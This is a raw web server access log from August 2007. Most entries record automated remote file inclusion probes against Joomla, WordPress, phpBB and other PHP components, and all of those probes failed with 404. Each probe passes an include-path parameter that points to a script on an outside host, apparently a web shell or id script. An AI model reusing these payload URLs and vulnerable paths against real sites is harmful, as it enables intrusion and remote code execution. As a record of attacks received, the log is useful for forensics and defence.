217.148.95.154 - - [06/Aug/2007:00:59:32 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.148.95.154 - - [06/Aug/2007:00:59:33 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.92.204.1 - - [06/Aug/2007:01:00:06 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
81.92.204.1 - - [06/Aug/2007:01:00:07 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
68.142.212.190 - - [06/Aug/2007:01:00:18 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.galf.org"
212.239.26.16 - - [06/Aug/2007:01:02:17 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
212.239.26.16 - - [06/Aug/2007:01:02:17 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
64.46.39.14 - - [06/Aug/2007:01:03:34 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
64.46.39.14 - - [06/Aug/2007:01:03:34 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:03:43 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:03:44 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
66.222.124.126 - - [06/Aug/2007:01:04:07 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.222.124.126 - - [06/Aug/2007:01:04:07 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.25.125 - - [06/Aug/2007:01:06:27 -0700] "GET /tmp/?M=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:06:29 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:06:29 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.192.125.110 - - [06/Aug/2007:01:07:41 -0700] "GET /logs/index.php?go=http://www.witheringinjustice.com/oA/newspublish/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.192.125.110 - - [06/Aug/2007:01:07:42 -0700] "GET /index.php?go=http://www.witheringinjustice.com/oA/newspublish/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:07:43 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:07:44 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.125.170.125 - - [06/Aug/2007:01:08:15 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" "www.galf.org"
217.125.170.125 - - [06/Aug/2007:01:08:15 -0700] "GET / HTTP/1.1" 200 1048 "http://www.geocities.com/raizdiversidad/conexiones.html?20076" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" "www.galf.org"
217.125.170.125 - - [06/Aug/2007:01:08:45 -0700] "GET / HTTP/1.1" 200 1048 "http://www.geocities.com/raizdiversidad/conexiones.html?20076" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" "www.galf.org"
217.125.170.125 - - [06/Aug/2007:01:08:45 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" "www.galf.org"
217.125.170.125 - - [06/Aug/2007:01:08:51 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" "www.galf.org"
217.125.170.125 - - [06/Aug/2007:01:08:54 -0700] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:11:07 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:11:07 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.192.125.110 - - [06/Aug/2007:01:11:29 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.witheringinjustice.com/oA/newspublish/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.192.125.110 - - [06/Aug/2007:01:11:29 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.witheringinjustice.com/oA/newspublish/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:12:14 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:12:14 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
65.55.208.231 - - [06/Aug/2007:01:15:49 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.231 - - [06/Aug/2007:01:15:50 -0700] "GET /labia/ HTTP/1.0" 200 508 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
72.232.72.58 - - [06/Aug/2007:01:18:01 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://toxicityazoty.free.fr/pitbull/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.72.58 - - [06/Aug/2007:01:18:01 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://toxicityazoty.free.fr/pitbull/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:18:31 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:18:32 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:20:08 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:20:08 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
63.85.9.161 - - [06/Aug/2007:01:20:24 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
63.85.9.161 - - [06/Aug/2007:01:20:25 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
76.4.42.135 - - [06/Aug/2007:01:22:00 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
76.4.42.135 - - [06/Aug/2007:01:22:01 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:25:36 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:25:37 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
66.59.75.99 - - [06/Aug/2007:01:26:07 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.59.75.99 - - [06/Aug/2007:01:26:16 -0700] "GET /logs/access_070730.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:26:41 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:26:41 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:26:52 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:26:53 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:28:59 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:28:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
38.114.104.42 - - [06/Aug/2007:01:29:26 -0700] "GET /logs/access.log HTTP/1.0" 200 111545 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:30:36 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:30:37 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
66.230.204.130 - - [06/Aug/2007:01:31:27 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.witheringinjustice.com/oA/newspublish/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [06/Aug/2007:01:31:27 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.witheringinjustice.com/oA/newspublish/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
62.149.196.204 - - [06/Aug/2007:01:32:13 -0700] "GET /logs/access_070618.log//auth/auth.php?phpbb_root_path=http://img98.imageshack.us/img98/2751/osrunok0.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.149.196.204 - - [06/Aug/2007:01:32:39 -0700] "GET /logs/access_070625.log//auth/auth.php?phpbb_root_path=http://img98.imageshack.us/img98/2751/osrunok0.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:32:56 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:32:56 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
64.46.39.14 - - [06/Aug/2007:01:33:09 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.46.39.14 - - [06/Aug/2007:01:34:33 -0700] "GET /logs/access_070730.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.116.175.193 - - [06/Aug/2007:01:36:06 -0700] "GET /logs/access_070730.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.116.175.193 - - [06/Aug/2007:01:36:06 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.116.175.193 - - [06/Aug/2007:01:36:07 -0700] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.116.175.193 - - [06/Aug/2007:01:36:11 -0700] "GET /logs/access_070723.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:36:27 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:36:33 -0700] "GET /logs/access_070730.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
66.230.204.130 - - [06/Aug/2007:01:37:08 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.witheringinjustice.com/oA/newspublish/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.230.204.130 - - [06/Aug/2007:01:37:08 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.witheringinjustice.com/oA/newspublish/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:37:46 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:37:46 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:40:29 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:40:30 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.241.213.167 - - [06/Aug/2007:01:40:49 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.167 - - [06/Aug/2007:01:40:50 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:41:00 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:41:01 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:41:16 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:41:17 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
88.80.208.155 - - [06/Aug/2007:01:44:35 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
88.80.208.155 - - [06/Aug/2007:01:44:43 -0700] "GET /logs/access_070730.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:45:18 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:45:24 -0700] "GET /logs/access_070730.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.148.95.154 - - [06/Aug/2007:01:47:23 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.148.95.154 - - [06/Aug/2007:01:47:35 -0700] "GET /logs/access_070730.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.92.204.1 - - [06/Aug/2007:01:47:54 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
81.92.204.1 - - [06/Aug/2007:01:48:03 -0700] "GET /logs/access_070730.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
64.34.170.230 - - [06/Aug/2007:01:49:35 -0700] "GET /logs/sohoadmin/includes/webmaster/product_update.php?_SESSION[docroot_path]=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [06/Aug/2007:01:49:35 -0700] "GET /sohoadmin/includes/webmaster/product_update.php?_SESSION[docroot_path]=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [06/Aug/2007:01:49:40 -0700] "GET /logs/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
64.34.170.230 - - [06/Aug/2007:01:49:40 -0700] "GET /sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.79.204.232 - - [06/Aug/2007:01:50:37 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
24.79.204.232 - - [06/Aug/2007:01:50:37 -0700] "GET /modules/My_eGallery/index.php?basepath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.80.248.166 - - [06/Aug/2007:01:50:40 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.80.248.166 - - [06/Aug/2007:01:50:40 -0700] "GET /modules/My_eGallery/index.php?basepath=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:50:57 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:50:57 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:51:23 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:01:51:24 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.40.96.10 - - [06/Aug/2007:01:53:23 -0700] "GET /modules/My_eGallery/index.php?basepath=http://afltech.host.sk/tools/sikat.htm?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.58.161.181 - - [06/Aug/2007:01:53:24 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ricksk8.xpg.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
207.58.161.181 - - [06/Aug/2007:01:53:24 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.ricksk8.xpg.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
64.34.170.230 - - [06/Aug/2007:01:54:38 -0700] "GET /logs/path_of_cpcommerce/_functions.php?prefixhttp://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [06/Aug/2007:01:54:38 -0700] "GET /path_of_cpcommerce/_functions.php?prefixhttp://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.10.128.68 - - [06/Aug/2007:01:55:35 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.68 - - [06/Aug/2007:01:55:35 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.104.72 - - [06/Aug/2007:01:55:39 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.avangard.altervista.org/HiP/micmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.104.72 - - [06/Aug/2007:01:55:39 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.avangard.altervista.org/HiP/micmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.104.72 - - [06/Aug/2007:01:56:16 -0700] "GET /logs//index.php?main=http://www.avangard.altervista.org/HiP/micmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.104.72 - - [06/Aug/2007:01:56:16 -0700] "GET //index.php?main=http://www.avangard.altervista.org/HiP/micmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
221.187.84.133 - - [06/Aug/2007:01:58:00 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)" "www.galf.org"
221.187.84.133 - - [06/Aug/2007:01:58:02 -0700] "GET /logs/access_070625.log HTTP/1.1" 200 694248 "http://www.google.com/search?hl=en&q=210.236.36.80&btnG=Google+Search" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)" "www.galf.org"
74.6.20.70 - - [06/Aug/2007:01:59:13 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.72.93 - - [06/Aug/2007:02:01:10 -0700] "GET /?D=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.34.170.230 - - [06/Aug/2007:02:01:24 -0700] "GET /logs/access_070730.log/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
